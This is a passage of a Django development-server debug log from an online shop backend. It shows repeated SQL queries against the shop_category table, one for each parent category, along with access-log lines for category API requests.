args=(20,) DEBUG 2019-12-13 14:03:53,920 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:03:53,923 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:03:53,927 utils 20136 140506652825344 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 14:03:53,931 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:03:53,933 utils 20136 140506652825344 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:03:53,935 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:03:53,940 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) [13/Dec/2019 14:03:53] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-13 14:03:53,943 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:03:53,946 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:03:53,948 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:03:53,951 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:03:53,954 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:03:53,957 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:03:53,962 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:03:53,967 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:03:53,971 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:03:53,975 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:03:53,981 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:03:53,985 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:03:53,989 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-13 14:03:53,993 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-13 14:03:53,998 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 14:03:54,003 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-13 14:03:54,005 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-13 14:03:54,007 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-13 14:03:54,009 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-13 14:03:54,011 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 14:03:54,015 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-13 14:03:54,017 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-13 14:03:54,019 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-13 14:03:54,022 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-13 14:03:54,024 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-13 14:03:54,026 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 14:03:54,029 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-13 14:03:54,031 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-13 14:03:54,033 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-13 14:03:54,036 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-13 14:03:54,038 utils 20136 140506667599616 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [13/Dec/2019 14:03:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [13/Dec/2019 14:03:59] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-13 14:04:22,339 utils 20136 140506667599616 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 14:04:22,350 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:04:22,356 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-13 14:04:22,367 utils 20136 140506667599616 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 14:04:22,375 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-13 14:04:22,382 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-13 14:04:22,388 utils 20136 140506652825344 (0.007) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-13 14:04:22,395 utils 20136 140506667599616 (0.008) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-13 14:04:22,399 utils 20136 140506652825344 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 14:04:22,404 utils 20136 140506667599616 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-13 14:04:22,410 utils 20136 140506667599616 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) [13/Dec/2019 14:04:22] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-13 14:04:22,417 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-13 14:04:22,422 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-13 14:04:22,426 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-13 14:04:22,430 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-13 14:04:22,434 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 14:04:22,441 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-13 14:04:22,445 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-13 14:04:22,449 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-13 14:04:22,454 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-13 14:04:22,458 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 14:04:22,464 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-13 14:04:22,468 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-13 14:04:22,472 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-13 14:04:22,477 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-13 14:04:22,481 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-13 14:04:22,485 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 14:04:22,492 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-13 14:04:22,496 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-13 14:04:22,500 utils 20136 140506667599616 (0.001) SELECT "shop_category"."id", 